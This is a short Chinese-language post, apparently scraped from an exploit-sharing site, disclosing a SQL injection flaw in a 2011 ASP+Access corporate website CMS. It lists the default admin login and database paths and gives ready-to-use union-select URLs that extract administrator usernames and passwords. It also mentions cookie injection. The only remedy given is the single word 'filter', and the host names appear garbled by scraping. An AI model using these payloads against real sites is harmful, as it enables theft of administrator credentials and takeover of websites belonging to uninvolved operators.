冠龙科技企业网站管理系统 2011 sql注入漏洞及修

by Mr.DzY from HdhCmsTest0855.tv

源码简介: 冠龙科技企业网站管理系统是基于ASP+ACCESS技术开发的电子商务平台,属于全自动化、全智能的在线方

式管理、维护、更新的网站管理系统。此系统直接上传到你的网站空间就可以使用了。完全后台操作。

源码下载:http://HdhCmsTest2cto测试数据/ym/201109/29454.html

默认后台: http://HdhCmsTest2cto测试数据 /admin/login.asp

默认数据库: http://HdhCmsTest2cto测试数据 /databases/%23database.mdb

exp: http://HdhCmsTest2cto测试数据 /2011/CompVisualizeBig.asp?id=23 union select 1,username%2bpassword,3,4,5 from admin

或者单独查: http://HdhCmsTest2cto测试数据 /2011/CompVisualizeBig.asp?id=23 union select 1,username,3,4,5 from admin http://HdhCmsTest2cto测试数据 /2011/CompVisualizeBig.asp?id=23 union select 1,password,3,4,5 from admin

另外还存在多处的 漏洞 .可cookies注入.

上次有朋友问%2b是什么?就是ascii码的"+"号的十六进制值.

修复:过滤.

查看更多关于冠龙科技企业网站管理系统 2011 sql注入漏洞及修的详细内容...